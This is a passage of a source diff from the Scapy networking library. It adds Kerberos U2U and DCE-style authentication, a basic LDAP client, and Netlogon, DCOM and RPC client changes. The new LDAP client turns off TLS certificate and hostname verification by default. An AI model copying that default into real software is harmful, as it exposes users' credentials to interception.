ValueError("KerberosSSP: Unexpected token !") + additional_tickets = [tgt_rep.ticket] if self.TGT is not None: if not self.KEY: raise ValueError("Cannot use TGT without the KEY") @@ -3260,6 +3476,8 @@ def GSS_Init_sec_context(self, Context: CONTEXT, val=None): ip=self.DC_IP, sessionkey=self.KEY, ticket=self.TGT, + additional_tickets=additional_tickets, + u2u=self.U2U, debug=self.debug, ) else: @@ -3270,6 +3488,8 @@ def GSS_Init_sec_context(self, Context: CONTEXT, val=None): ip=self.DC_IP, key=self.KEY, password=self.PASSWORD, + additional_tickets=additional_tickets, + u2u=self.U2U, debug=self.debug, ) if not res: @@ -3278,22 +3498,21 @@ def GSS_Init_sec_context(self, Context: CONTEXT, val=None): self.ST, self.KEY = res.tgsrep.ticket, res.sessionkey elif not self.KEY: raise ValueError("Must provide KEY with ST") + Context.STSessionKey = self.KEY # Save ServerHostname if len(self.ST.sname.nameString) == 2: Context.ServerHostname = self.ST.sname.nameString[1].val.decode() # Build the KRB-AP - ap_req = KRB_GSSAPI_Token( - innerToken=KRB_InnerToken( - root=KRB_AP_REQ( - apOptions=( - ASN1_BIT_STRING("001") # mutual-required - if self.MUTUAL - else ASN1_BIT_STRING("000") - ), - ticket=self.ST, - authenticator=EncryptedData(), - ) - ) + apOptions = ASN1_BIT_STRING("000") + if Context.flags & GSS_C_FLAGS.GSS_C_MUTUAL_FLAG: + apOptions.set(2, "1") # mutual-required + if self.U2U: + apOptions.set(1, "1") # use-session-key + Context.U2U = True + ap_req = KRB_AP_REQ( + apOptions=apOptions, + ticket=self.ST, + authenticator=EncryptedData(), ) # Build the authenticator now_time = datetime.utcnow().replace(microsecond=0, tzinfo=timezone.utc) @@ -3301,27 +3520,21 @@ def GSS_Init_sec_context(self, Context: CONTEXT, val=None): EncryptionType.AES128_CTS_HMAC_SHA1_96, os.urandom(16), ) - Context.SeqNum = RandNum(0, 0x7FFFFFFF)._fix() - ap_req.innerToken.root.authenticator.encrypt( - self.KEY, + Context.SendSeqNum = RandNum(0, 0x7FFFFFFF)._fix() + ap_req.authenticator.encrypt( + Context.STSessionKey, KRB_Authenticator( crealm=self.ST.realm, cname=PrincipalName.fromUPN(self.UPN), # RFC 4121 checksum cksum=Checksum( cksumtype="KRB-AUTHENTICATOR", - checksum=KRB_AuthenticatorChecksum( - Flags=( - "GSS_C_MUTUAL_FLAG+GSS_C_EXTENDED_ERROR_FLAG" - if self.MUTUAL - else "GSS_C_EXTENDED_ERROR_FLAG" - ) - ), + checksum=KRB_AuthenticatorChecksum(Flags=int(Context.flags)), ), ctime=ASN1_GENERALIZED_TIME(now_time), cusec=ASN1_INTEGER(0), subkey=EncryptionKey.fromKey(Context.KrbSessionKey), - seqNumber=Context.SeqNum, + seqNumber=Context.SendSeqNum, encAuthorizationData=AuthorizationData( seq=[ AuthorizationDataItem( @@ -3348,38 +3561,88 @@ def GSS_Init_sec_context(self, Context: CONTEXT, val=None): ), ) Context.state = self.STATE.CLI_SENT_APREQ - return Context, ap_req, GSS_S_CONTINUE_NEEDED + if Context.flags & GSS_C_FLAGS.GSS_C_DCE_STYLE: + # Raw kerberos DCE-STYLE + return Context, ap_req, GSS_S_CONTINUE_NEEDED + else: + # Kerberos wrapper + return ( + Context, + KRB_GSSAPI_Token( + innerToken=KRB_InnerToken( + root=ap_req, + ) + ), + GSS_S_CONTINUE_NEEDED, + ) + elif Context.state == self.STATE.CLI_SENT_APREQ: if isinstance(val, KRB_AP_REP): # Raw AP_REP was passed ap_rep = val else: try: - # GSSAPI/Kerberos + # GSSAPI / Kerberos ap_rep = val.root.innerToken.root except AttributeError: try: - # Raw Kerberos + # Kerberos ap_rep = val.innerToken.root except AttributeError: - return Context, None, GSS_S_DEFECTIVE_TOKEN + try: + # Raw kerberos DCE-STYLE + ap_rep = val.root + except AttributeError: + return Context, None, GSS_S_DEFECTIVE_TOKEN if not isinstance(ap_rep, KRB_AP_REP): - ap_rep.show() - raise ValueError("KerberosSSP: Unexpected token !") + return Context, None, GSS_S_DEFECTIVE_TOKEN # Retrieve SessionKey - repPart = ap_rep.encPart.decrypt(self.KEY) + repPart = ap_rep.encPart.decrypt(Context.STSessionKey) if repPart.subkey is not None: Context.SessionKey = repPart.subkey.keyvalue.val + Context.KrbSessionKey = repPart.subkey.toKey() # OK ! Context.state = self.STATE.CLI_RCVD_APREP + if Context.flags & GSS_C_FLAGS.GSS_C_DCE_STYLE: + # [MS-KILE] sect 3.4.5.1 + # The client MUST generate an additional AP exchange reply message + # exactly as the server would as the final message to send to the + # server. + now_time = datetime.utcnow().replace(microsecond=0, tzinfo=timezone.utc) + cli_ap_rep = KRB_AP_REP(encPart=EncryptedData()) + cli_ap_rep.encPart.encrypt( + Context.STSessionKey, + EncAPRepPart( + ctime=ASN1_GENERALIZED_TIME(now_time), + seqNumber=repPart.seqNumber, + subkey=None, + ), + ) + return Context, cli_ap_rep, GSS_S_COMPLETE + return Context, None, GSS_S_COMPLETE + elif ( + Context.state == self.STATE.CLI_RCVD_APREP + and Context.flags & GSS_C_FLAGS.GSS_C_DCE_STYLE + ): + # DCE_STYLE with SPNEGOSSP return Context, None, GSS_S_COMPLETE else: raise ValueError("KerberosSSP: Unknown state") + def _setup_u2u(self): + if not self.TGT: + # Get a TGT for ourselves + try: + upn = "@".join(self.SPN.split("/")[1].split(".", 1)) + except KeyError: + raise ValueError("Couldn't transform the SPN into a valid UPN") + res = krb_as_req(upn, self.DC_IP, key=self.KEY) + self.TGT, self.KEY = res.asrep.ticket, res.sessionkey + def GSS_Accept_sec_context(self, Context: CONTEXT, val=None): if Context is None: # New context - Context = self.CONTEXT() + Context = self.CONTEXT(IsAcceptor=True) from scapy.libs.rfc3961 import Key, EncryptionType @@ -3387,18 +3650,23 @@ def GSS_Accept_sec_context(self, Context: CONTEXT, val=None): if not self.SPN: raise ValueError("Missing SPN attribute") # Server receives AP-req, sends AP-rep - try: - # GSSAPI/Kerberos - ap_req = val.root.innerToken.root - except AttributeError: + if isinstance(val, KRB_AP_REQ): + # Raw AP_REQ was passed + ap_req = val + else: try: - # Raw Kerberos - ap_req = val.root + # GSSAPI/Kerberos + ap_req = val.root.innerToken.root except AttributeError: - return Context, None, GSS_S_DEFECTIVE_TOKEN + try: + # Raw Kerberos + ap_req = val.root + except AttributeError: + return Context, None, GSS_S_DEFECTIVE_TOKEN if isinstance(ap_req, KRB_TGT_REQ): # Special U2U case self._setup_u2u() + Context.U2U = True return ( None, KRB_GSSAPI_Token( @@ -3428,6 +3696,7 @@ def GSS_Accept_sec_context(self, Context: CONTEXT, val=None): if self.REQUIRE_U2U and ap_req.apOptions.val[1] != "1": # use-session-key # Required but not provided. Return an error self._setup_u2u() + Context.U2U = True now_time = datetime.utcnow().replace(microsecond=0, tzinfo=timezone.utc) err = KRB_GSSAPI_Token( innerToken=KRB_InnerToken( @@ -3451,8 +3720,8 @@ def GSS_Accept_sec_context(self, Context: CONTEXT, val=None): warning("KerberosSSP: %s (bad KEY?)" % ex) return Context, None, GSS_S_DEFECTIVE_TOKEN # Get AP-REP session key - sessionkey = tkt.key.toKey() - authenticator = ap_req.authenticator.decrypt(sessionkey) + Context.STSessionKey = tkt.key.toKey() + authenticator = ap_req.authenticator.decrypt(Context.STSessionKey) # Compute an application session key ([MS-KILE] sect 3.1.1.2) subkey = None if ap_req.apOptions.val[2] == "1": # mutual-required @@ -3466,10 +3735,15 @@ def GSS_Accept_sec_context(self, Context: CONTEXT, val=None): else: Context.KrbSessionKey = self.KEY Context.SessionKey = self.KEY.key + # Eventually process the "checksum" + if authenticator.cksum: + if authenticator.cksum.cksumtype == 0x8003: + # KRB-Authenticator + Context.flags = GSS_C_FLAGS(int(authenticator.cksum.checksum.Flags)) # Build response (RFC4120 sect 3.2.4) ap_rep = KRB_AP_REP(encPart=EncryptedData()) ap_rep.encPart.encrypt( - sessionkey, + Context.STSessionKey, EncAPRepPart( ctime=authenticator.ctime, cusec=authenticator.cusec, @@ -3478,6 +3752,78 @@ def GSS_Accept_sec_context(self, Context: CONTEXT, val=None): ), ) Context.state = self.STATE.SRV_SENT_APREP + if Context.flags & GSS_C_FLAGS.GSS_C_DCE_STYLE: + # [MS-KILE] sect 3.4.5.1 + return Context, ap_rep, GSS_S_CONTINUE_NEEDED return Context, ap_rep, GSS_S_COMPLETE # success + elif ( + Context.state == self.STATE.SRV_SENT_APREP + and Context.flags & GSS_C_FLAGS.GSS_C_DCE_STYLE + ): + # [MS-KILE] sect 3.4.5.1 + # The server MUST receive the additional AP exchange reply message and + # verify that the message is constructed correctly. + if not val: + return Context, None, GSS_S_DEFECTIVE_TOKEN + val.show() + # Server receives AP-req, sends AP-rep + if isinstance(val, KRB_AP_REP): + # Raw AP_REP was passed + ap_rep = val + else: + try: + # GSSAPI/Kerberos + ap_rep = val.root.innerToken.root + except AttributeError: + try: + # Raw Kerberos + ap_rep = val.root + except AttributeError: + return Context, None, GSS_S_DEFECTIVE_TOKEN + # Decrypt the AP-REP + try: + ap_rep.encPart.decrypt(Context.STSessionKey) + except ValueError as ex: + warning("KerberosSSP: %s (bad KEY?)" % ex) + return Context, None, GSS_S_DEFECTIVE_TOKEN + return Context, None, GSS_S_COMPLETE # success else: raise ValueError("KerberosSSP: Unknown state %s" % repr(Context.state)) + + def GSS_Passive(self, Context: CONTEXT, val=None): + if Context is None: + Context = self.CONTEXT(True) + Context.passive = True + + if Context.state == self.STATE.INIT: + Context, _, status = self.GSS_Accept_sec_context(Context, val) + Context.state = self.STATE.CLI_SENT_APREQ + return Context, status + elif Context.state == self.STATE.CLI_SENT_APREQ: + Context, _, status = self.GSS_Init_sec_context(Context, val) + return Context, status + + def GSS_Passive_set_Direction(self, Context: CONTEXT, IsAcceptor=False): + if Context.IsAcceptor is not IsAcceptor: + return + # Swap everything + self.SendSealKeyUsage, self.RecvSealKeyUsage = ( + self.RecvSealKeyUsage, + self.SendSealKeyUsage, + ) + self.SendSignKeyUsage, self.RecvSignKeyUsage = ( + self.RecvSignKeyUsage, + self.SendSignKeyUsage, + ) + Context.IsAcceptor = not Context.IsAcceptor + + def MaximumSignatureLength(self, Context: CONTEXT): + if Context.flags & GSS_C_FLAGS.GSS_C_CONF_FLAG: + # FIXME, this is broken + if Context.KrbSessionKey.etype in [17, 18]: # AES + return 60 + else: + return 28 + + def canMechListMIC(self, Context: CONTEXT): + return bool(Context.KrbSessionKey) diff --git a/scapy/layers/ldap.py b/scapy/layers/ldap.py index 8aa3f2f60ae..932bda15d2c 100644 --- a/scapy/layers/ldap.py +++ b/scapy/layers/ldap.py @@ -15,10 +15,13 @@ """ import collections +import ssl import socket import struct import uuid +from enum import Enum + from scapy.ansmachine import AnsweringMachine from scapy.asn1.asn1 import ( ASN1_STRING, @@ -43,18 +46,30 @@ from scapy.config import conf from scapy.error import log_runtime from scapy.packet import bind_bottom_up, bind_layers -from scapy.supersocket import SimpleSocket +from scapy.supersocket import ( + SimpleSocket, + StreamSocket, +) from scapy.layers.dns import dns_resolve from scapy.layers.inet import IP, TCP, UDP from scapy.layers.inet6 import IPv6 -from scapy.layers.gssapi import GSSAPI_BLOB -from scapy.layers.kerberos import _ASN1FString_PacketField +from scapy.layers.gssapi import ( + GSS_S_COMPLETE, + GSSAPI_BLOB, + SSP, +) +from scapy.layers.kerberos import ( + _ASN1FString_PacketField, + KRB_GSSAPI_Token, +) +from scapy.layers.ntlm import NTLMSSP from scapy.layers.smb import ( NETLOGON, NETLOGON_SAM_LOGON_RESPONSE_EX, ) + # Elements of protocol # https://datatracker.ietf.org/doc/html/rfc1777#section-4 @@ -94,6 +109,8 @@ class LDAPReferral(ASN1_Packet): 6: "compareTrue", 7: "authMethodNotSupported", 8: "strongAuthRequired", + 10: "referral", + 14: "saslBindInProgress", 16: "noSuchAttribute", 17: "undefinedAttributeType", 18: "inappropriateMatching", @@ -131,6 +148,7 @@ class LDAPReferral(ASN1_Packet): # ldap APPLICATION + class ASN1_Class_LDAP(ASN1_Class): name = "LDAP" # APPLICATION + CONSTRUCTED = 0x40 | 0x20 @@ -169,7 +187,7 @@ class ASN1_Class_LDAP_Authentication(ASN1_Class): sasl = 0xA3 # CONTEXT-SPECIFIC | CONSTRUCTED -class ASN1_LDAP_Authentication_simple(ASN1_STRING): +class LDAP_Authentication_simple(ASN1_STRING): tag = ASN1_Class_LDAP_Authentication.simple @@ -181,7 +199,7 @@ class ASN1F_LDAP_Authentication_simple(ASN1F_STRING): ASN1_tag = ASN1_Class_LDAP_Authentication.simple -class ASN1_LDAP_Authentication_krbv42LDAP(ASN1_STRING): +class LDAP_Authentication_krbv42LDAP(ASN1_STRING): tag = ASN1_Class_LDAP_Authentication.krbv42LDAP @@ -193,7 +211,7 @@ class ASN1F_LDAP_Authentication_krbv42LDAP(ASN1F_STRING): ASN1_tag = ASN1_Class_LDAP_Authentication.krbv42LDAP -class ASN1_LDAP_Authentication_krbv42DSA(ASN1_STRING): +class LDAP_Authentication_krbv42DSA(ASN1_STRING): tag = ASN1_Class_LDAP_Authentication.krbv42DSA @@ -205,12 +223,12 @@ class ASN1F_LDAP_Authentication_krbv42DSA(ASN1F_STRING): ASN1_tag = ASN1_Class_LDAP_Authentication.krbv42DSA -_SASL_MECHANISMS = {b"GSS-SPNEGO": GSSAPI_BLOB} +_SASL_MECHANISMS = {b"GSS-SPNEGO": GSSAPI_BLOB, b"GSSAPI": KRB_GSSAPI_Token} -class _SaslCredentialsField(_ASN1FString_PacketField): +class _ReqSaslCredentialsField(_ASN1FString_PacketField): def m2i(self, pkt, s): - val = super(_SaslCredentialsField, self).m2i(pkt, s) + val = super(_ReqSaslCredentialsField, self).m2i(pkt, s) if not val[0].val: return val if pkt.mechanism.val in _SASL_MECHANISMS: @@ -221,17 +239,17 @@ def m2i(self, pkt, s): return val -class LDAP_SaslCredentials(ASN1_Packet): +class LDAP_Authentication_SaslCredentials(ASN1_Packet): ASN1_codec = ASN1_Codecs.BER ASN1_root = ASN1F_SEQUENCE( - LDAPString("mechanism", ""), _SaslCredentialsField("credentials", "") + LDAPString("mechanism", ""), _ReqSaslCredentialsField("credentials", "") ) class LDAP_BindRequest(ASN1_Packet): ASN1_codec = ASN1_Codecs.BER ASN1_root = ASN1F_SEQUENCE( - ASN1F_INTEGER("version", 2), + ASN1F_INTEGER("version", 3), LDAPDN("bind_name", ""), ASN1F_CHOICE( "authentication", @@ -240,8 +258,10 @@ class LDAP_BindRequest(ASN1_Packet): ASN1F_LDAP_Authentication_krbv42LDAP, ASN1F_LDAP_Authentication_krbv42DSA, ASN1F_PACKET( - "sasl", LDAP_SaslCredentials(), LDAP_SaslCredentials, - implicit_tag=ASN1_Class_LDAP_Authentication.sasl + "sasl", + LDAP_Authentication_SaslCredentials(), + LDAP_Authentication_SaslCredentials, + implicit_tag=ASN1_Class_LDAP_Authentication.sasl, ), ), implicit_tag=ASN1_Class_LDAP.BindRequest, @@ -302,10 +322,7 @@ class LDAP_SubstringFilterStr(ASN1_Packet): implicit_tag=0x80, ), ASN1F_PACKET( - "any", - LDAP_SubstringFilterAny(), - LDAP_SubstringFilterAny, - implicit_tag=0x81 + "any", LDAP_SubstringFilterAny(), LDAP_SubstringFilterAny, implicit_tag=0x81 ), ASN1F_PACKET( "final", @@ -377,7 +394,7 @@ class ASN1_Class_LDAP_Filter(ASN1_Class): Substrings = 0xA4 GreaterOrEqual = 0xA5 LessOrEqual = 0xA6 - Present = 0xA7 + Present = 0x87 # not constructed ApproxMatch = 0xA8 @@ -386,24 +403,51 @@ class LDAP_Filter(ASN1_Packet): ASN1_root = ASN1F_CHOICE( "filter", LDAP_FilterPresent(), - ASN1F_PACKET("and_", None, LDAP_FilterAnd, - implicit_tag=ASN1_Class_LDAP_Filter.And), - ASN1F_PACKET("or_", None, LDAP_FilterOr, - implicit_tag=ASN1_Class_LDAP_Filter.Or), - ASN1F_PACKET("not_", None, _LDAP_Filter, - implicit_tag=ASN1_Class_LDAP_Filter.Not), - ASN1F_PACKET("equalityMatch", None, LDAP_FilterEqual, - implicit_tag=ASN1_Class_LDAP_Filter.EqualityMatch), - ASN1F_PACKET("substrings", None, LDAP_SubstringFilter, - implicit_tag=ASN1_Class_LDAP_Filter.Substrings), - ASN1F_PACKET("greaterOrEqual", None, LDAP_FilterGreaterOrEqual, - implicit_tag=ASN1_Class_LDAP_Filter.GreaterOrEqual), - ASN1F_PACKET("lessOrEqual", None, LDAP_FilterLessOrEqual, - implicit_tag=ASN1_Class_LDAP_Filter.LessOrEqual), - ASN1F_PACKET("present", None, LDAP_FilterPresent, - implicit_tag=ASN1_Class_LDAP_Filter.Present), - ASN1F_PACKET("approxMatch", None, LDAP_FilterApproxMatch, - implicit_tag=ASN1_Class_LDAP_Filter.ApproxMatch), + ASN1F_PACKET( + "and_", None, LDAP_FilterAnd, implicit_tag=ASN1_Class_LDAP_Filter.And + ), + ASN1F_PACKET( + "or_", None, LDAP_FilterOr, implicit_tag=ASN1_Class_LDAP_Filter.Or + ), + ASN1F_PACKET( + "not_", None, _LDAP_Filter, implicit_tag=ASN1_Class_LDAP_Filter.Not + ), + ASN1F_PACKET( + "equalityMatch", + None, + LDAP_FilterEqual, + implicit_tag=ASN1_Class_LDAP_Filter.EqualityMatch, + ), + ASN1F_PACKET( + "substrings", + None, + LDAP_SubstringFilter, + implicit_tag=ASN1_Class_LDAP_Filter.Substrings, + ), + ASN1F_PACKET( + "greaterOrEqual", + None, + LDAP_FilterGreaterOrEqual, + implicit_tag=ASN1_Class_LDAP_Filter.GreaterOrEqual, + ), + ASN1F_PACKET( + "lessOrEqual", + None, + LDAP_FilterLessOrEqual, + implicit_tag=ASN1_Class_LDAP_Filter.LessOrEqual, + ), + ASN1F_PACKET( + "present", + None, + LDAP_FilterPresent, + implicit_tag=ASN1_Class_LDAP_Filter.Present, + ), + ASN1F_PACKET( + "approxMatch", + None, + LDAP_FilterApproxMatch, + implicit_tag=ASN1_Class_LDAP_Filter.ApproxMatch, + ), ) @@ -843,3 +887,166 @@ def dclocator( finally: sock.close() raise ValueError("No LDAP ping succeeded on any of %s. Try another mode?" % ips) + + +##################### +# Basic LDAP client # +##################### + + +class LDAP_BIND_MECHS(Enum): + NONE = "NONE" + SIMPLE = "SIMPLE" + SASL_GSSAPI = "GSSAPI" + SASL_GSS_SPNEGO = "GSS-SPNEGO" + SASL_EXTERNAL = "EXTERNAL" + SASL_DIGEST_MD5 = "DIGEST-MD5" + + +class LDAP_Client(object): + """ + A basic LDAP client + + :param mech: one of LDAP_BIND_MECHS + :param ssl: whether to use LDAPS or not + """ + + def __init__(self, mech, verb=True, ssl=False, sslcontext=None, **kwargs): + self.sock = None + self.mech = mech + self.verb = verb + self.ssl = ssl + self.sslcontext = sslcontext + self.ssp = kwargs.pop("ssp", None) # type: SSP + assert isinstance(mech, LDAP_BIND_MECHS) + if isinstance(self.ssp, NTLMSSP): + raise ValueError("Cannot use raw NTLMSSP in LDAP ! Wrap it in SPNEGOSSP.") + elif self.ssp is not None and mech in [ + LDAP_BIND_MECHS.NONE, + LDAP_BIND_MECHS.SIMPLE, + ]: + raise ValueError("%s cannot be used with a ssp !" % mech.value) + self.sspcontext = None + self.messageID = 0 + + def connect(self, ip, port=389, timeout=5): + """ + Initiate a connection + """ + sock = socket.socket() + sock.settimeout(timeout) + if self.verb: + print( + "\u2503 Connecting to %s on port %s%s..." + % ( + ip, + port, + " with SSL" if self.ssl else "", + ) + ) + sock.connect((ip, port)) + if self.verb: + print( + conf.color_theme.green( + "\u2514 Connected from %s" % repr(sock.getsockname()) + ) + ) + if self.ssl: + if self.sslcontext is None: + context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT) + context.check_hostname = False + context.verify_mode = ssl.CERT_NONE + else: + context = self.sslcontext + sock = context.wrap_socket(sock) + self.sock = StreamSocket(sock, LDAP) + + def sr1(self, protocolOp, controls=None, **kwargs): + self.messageID += 1 + if self.verb: + print(conf.color_theme.opening(">> %s" % protocolOp.__class__.__name__)) + resp = self.sock.sr1( + LDAP( + messageID=self.messageID, + protocolOp=protocolOp, + Controls=controls, + ), + verbose=0, + **kwargs, + ) + if self.verb: + print( + conf.color_theme.success( + "<< %s" + % ( + resp.protocolOp.__class__.__name__ + if LDAP in resp + else resp.__class__.__name__ + ) + ) + ) + return resp + + def bind(self, simple_username=None, simple_password=None): + """ + Send Bind request. + This acts differently based on the :mech: provided during initialization. + """ + if self.mech == LDAP_BIND_MECHS.SIMPLE: + # Simple binding + resp = self.sr1( + LDAP_BindRequest( + bind_name=ASN1_STRING(simple_username or ""), + authentication=LDAP_Authentication_simple( + simple_password or "", + ), + ) + ) + if ( + LDAP not in resp + or not isinstance(resp.protocolOp, LDAP_BindResponse) + or resp.protocolOp.resultCode != 0 + ): + if self.verb: + resp.show() + raise RuntimeError("LDAP simple bind failed !") + elif self.mech in [ + LDAP_BIND_MECHS.SASL_GSS_SPNEGO, + LDAP_BIND_MECHS.SASL_GSSAPI, + ]: + # GSSAPI or SPNEGO + self.sspcontext, token, status = self.ssp.GSS_Init_sec_context( + self.sspcontext, None + ) + while token: + resp = self.sr1( + LDAP_BindRequest( + bind_name=ASN1_STRING(b""), + authentication=LDAP_Authentication_SaslCredentials( + mechanism=ASN1_STRING(self.mech.value), + credentials=ASN1_STRING(bytes(token)), + ), + ) + ) + self.sspcontext, token, status = self.ssp.GSS_Init_sec_context( + self.sspcontext, GSSAPI_BLOB(resp.protocolOp.serverSaslCreds.val) + ) + if self.mech == LDAP_BIND_MECHS.SASL_GSSAPI and status == GSS_S_COMPLETE: + # https://datatracker.ietf.org/doc/html/rfc2222#section-7.2.1 + resp = self.sr1( + LDAP_BindRequest( + bind_name=ASN1_STRING(b""), + authentication=LDAP_Authentication_SaslCredentials( + mechanism=ASN1_STRING(self.mech.value), + credentials=ASN1_STRING(token or b""), + ), + ) + ) + resp.show() + if self.verb: + print("%s bind succeeded !" % self.mech.name) + + def close(self): + if self.verb: + print("X Connection closed\n") + self.sock.close() diff --git a/scapy/layers/msrpce/msdcom.py b/scapy/layers/msrpce/msdcom.py index 99f53fd62f5..6be74978ddd 100644 --- a/scapy/layers/msrpce/msdcom.py +++ b/scapy/layers/msrpce/msdcom.py @@ -42,6 +42,7 @@ NDRSerializeType1PacketField, NDRSerializeType1PacketListField, ndr_deserialize1, + find_dcerpc_interface, RPC_C_AUTHN, ) from scapy.layers.msrpce.rpcclient import DCERPC_Client, DCERPC_Transport @@ -452,7 +453,7 @@ def default_payload_class(self, payload): class SECURITYBINDING(Packet): fields_desc = [ LEShortEnumField("wAuthnSvc", 0, RPC_C_AUTHN), - ConditionalField(XShortField("Reserved", 0xffff), lambda pkt: pkt.wAuthnSvc), + ConditionalField(XShortField("Reserved", 0xFFFF), lambda pkt: pkt.wAuthnSvc), ConditionalField( StrNullFieldUtf16("aPrincName", ""), lambda pkt: pkt.wAuthnSvc ), @@ -467,22 +468,32 @@ def default_payload_class(self, payload): class DCOM_Client(DCERPC_Client): """ - A wrapper of DCERPC_Client that adds functions to use DCOM interfaces + A wrapper of DCERPC_Client that adds functions to use COM interfaces. + + In this client, the DCE/RPC is abstracted to allow to focus on the upper + DCOM one. DCE/RPC interfaces are bound automatically and ORPCTHIS/ORPCTHAT + automatically added/extracted. + + It also provides common handlers for the few [MS-DCOM] special interfaces. """ def __init__(self, verb=True, **kwargs): - kwargs.setdefault("port", 135) super(DCOM_Client, self).__init__( DCERPC_Transport.NCACN_IP_TCP, ndr64=False, verb=verb, **kwargs ) + def connect(self, *args, **kwargs): + kwargs.setdefault("port", 135) + super(DCOM_Client, self).connect(*args, **kwargs) + def ServerAlive2(self): """ - Call ServerAlive2 and print the results + Call IObjectExporter::ServerAlive2 """ + self.bind_or_alter(find_dcerpc_interface("IObjectExporter")) resp = self.sr1_req(ServerAlive2_Request(ndr64=False)) binds, secs = _parseStringArray(resp.ppdsaOrBindings.value) - DCOMResults = collections.namedtuple('DCOMResults', ['addresses', 'ssps']) + DCOMResults = collections.namedtuple("DCOMResults", ["addresses", "ssps"]) addresses = [] ssps = [] for b in binds: @@ -491,7 +502,8 @@ def ServerAlive2(self): addresses.append(b.aNetworkAddr) for b in secs: ssps.append( - "%s%s" % ( + "%s%s" + % ( b.sprintf("%wAuthnSvc%"), b.aPrincName and "%s/" % b.aPrincName or "", ) diff --git a/scapy/layers/msrpce/msnrpc.py b/scapy/layers/msrpce/msnrpc.py index b02c13e98bd..c77792b421a 100644 --- a/scapy/layers/msrpce/msnrpc.py +++ b/scapy/layers/msrpce/msnrpc.py @@ -20,7 +20,12 @@ NL_AUTH_MESSAGE, NL_AUTH_SIGNATURE, ) -from scapy.layers.gssapi import GSS_S_COMPLETE +from scapy.layers.gssapi import ( + GSS_C_FLAGS, + GSS_S_COMPLETE, + GSS_S_CONTINUE_NEEDED, + GSS_S_FAILURE, +) from scapy.layers.ntlm import RC4, RC4K, RC4Init, SSP from scapy.layers.msrpce.rpcclient import DCERPC_Client, DCERPC_Transport @@ -43,6 +48,12 @@ hashes = hmac = Cipher = algorithms = modes = DES = None +# Typing imports +from typing import ( + Optional, +) + + # --- RFC @@ -178,14 +189,25 @@ def ComputeNetlogonSequenceNumberKey(SessionKey, Checksum): class NetlogonSSP(SSP): auth_type = 0x44 # Netlogon - dcerpc_header_signing = False - class CONTEXT(SSP.CONTEXT): - __slots__ = ["ClientSequenceNumber", "IsClient"] + class STATE(SSP.STATE): + INIT = 1 + CLI_SENT_NL = 2 + SRV_SENT_NL = 3 - def __init__(self, IsClient): + class CONTEXT(SSP.CONTEXT): + __slots__ = [ + "ClientSequenceNumber", + "IsClient", + "AES", + ] + + def __init__(self, IsClient, req_flags=None): + self.state = NetlogonSSP.STATE.INIT self.IsClient = IsClient self.ClientSequenceNumber = 0 + self.AES = False + super(NetlogonSSP.CONTEXT, self).__init__(req_flags=req_flags) def __init__(self, SessionKey, computername, domainname, **kwargs): self.SessionKey = SessionKey @@ -293,33 +315,57 @@ def GSS_UnwrapEx(self, Context, msgs, signature): def GSS_VerifyMICEx(self, Context, msgs, signature): self._unsecure(Context, msgs, signature, False) - def GSS_Init_sec_context(self, Context, val=None): + def GSS_Init_sec_context( + self, Context, val=None, req_flags: Optional[GSS_C_FLAGS] = None + ): if Context is None: - Context = self.CONTEXT(True) - - return ( - Context, - NL_AUTH_MESSAGE( - MessageType=0, - Flags=3, - NetbiosDomainName=self.domainname, - NetbiosComputerName=self.computername, - ), - GSS_S_COMPLETE, - ) + Context = self.CONTEXT(True, req_flags=req_flags) + + if Context.state == self.STATE.INIT: + Context.state = self.STATE.CLI_SENT_NL + return ( + Context, + NL_AUTH_MESSAGE( + MessageType=0, + Flags=3, + NetbiosDomainName=self.domainname, + NetbiosComputerName=self.computername, + ), + GSS_S_CONTINUE_NEEDED, + ) + else: + return Context, None, GSS_S_COMPLETE def GSS_Accept_sec_context(self, Context, val=None): if Context is None: Context = self.CONTEXT(False) - return ( - Context, - NL_AUTH_MESSAGE( - MessageType=1, - Flags=0, - ), - GSS_S_COMPLETE, - ) + if Context.state == self.STATE.INIT: + Context.state = self.STATE.SRV_SENT_NL + return ( + Context, + NL_AUTH_MESSAGE( + MessageType=1, + Flags=0, + ), + GSS_S_COMPLETE, + ) + else: + # Invalid state + return Context, None, GSS_S_FAILURE + + def MaximumSignatureLength(self, Context: CONTEXT): + """ + Returns the Maximum Signature length. + + This will be used in auth_len in DceRpc5, and is necessary for + PFC_SUPPORT_HEADER_SIGN to work properly. + """ + # len(NL_AUTH_SIGNATURE()) + if Context.AES: + return 48 + else: + return 32 # --- Utils @@ -336,12 +382,12 @@ def __init__( self.interface = find_dcerpc_interface("logon") self.ndr64 = False # Netlogon doesn't work with NDR64 self.SessionKey = None - self.auth_level = auth_level self.domainname = domainname self.computername = computername self.ClientStoredCredential = None super(NetlogonClient, self).__init__( DCERPC_Transport.NCACN_IP_TCP, + auth_level=auth_level, ndr64=self.ndr64, verb=verb, ) @@ -373,7 +419,6 @@ def setSessionKey(self, SessionKey): self.SessionKey = SessionKey self.ssp = self.sock.session.ssp = NetlogonSSP( SessionKey=self.SessionKey, - auth_level=self.auth_level, domainname=self.domainname, computername=self.computername, ) diff --git a/scapy/layers/msrpce/rpcclient.py b/scapy/layers/msrpce/rpcclient.py index 80f4c2055f9..f2c06533d22 100644 --- a/scapy/layers/msrpce/rpcclient.py +++ b/scapy/layers/msrpce/rpcclient.py @@ -30,14 +30,17 @@ DCERPC_Transport, find_dcerpc_interface, CommonAuthVerifier, + DCE_C_AUTHN_LEVEL, # NDR NDRPointer, NDRContextHandle, ) from scapy.layers.gssapi import ( SSP, + GSS_S_FAILURE, GSS_S_COMPLETE, GSS_S_CONTINUE_NEEDED, + GSS_C_FLAGS, ) from scapy.layers.smbclient import ( SMB_RPC_SOCKET, @@ -72,8 +75,11 @@ def __init__(self, transport, ndr64=False, ndrendian="little", verb=True, **kwar self.ndr64 = ndr64 self.ndrendian = ndrendian self.verb = verb + self.auth_level = kwargs.pop("auth_level", DCE_C_AUTHN_LEVEL.NONE) + self.auth_context_id = kwargs.pop("auth_context_id", 0) self.ssp = kwargs.pop("ssp", None) # type: SSP self.sspcontext = None + self.dcesockargs = kwargs @classmethod def from_smblink(cls, smbcli, smb_kwargs={}, **kwargs): @@ -82,7 +88,14 @@ def from_smblink(cls, smbcli, smb_kwargs={}, **kwargs): """ client = DCERPC_Client(DCERPC_Transport.NCACN_NP, **kwargs) sock = client.smbrpcsock = SMB_RPC_SOCKET(smbcli, **smb_kwargs) - client.sock = DceRpcSocket(sock, DceRpc5, ssp=client.ssp) + client.sock = DceRpcSocket( + sock, + DceRpc5, + ssp=client.ssp, + auth_level=client.auth_level, + auth_context_id=client.auth_context_id, + 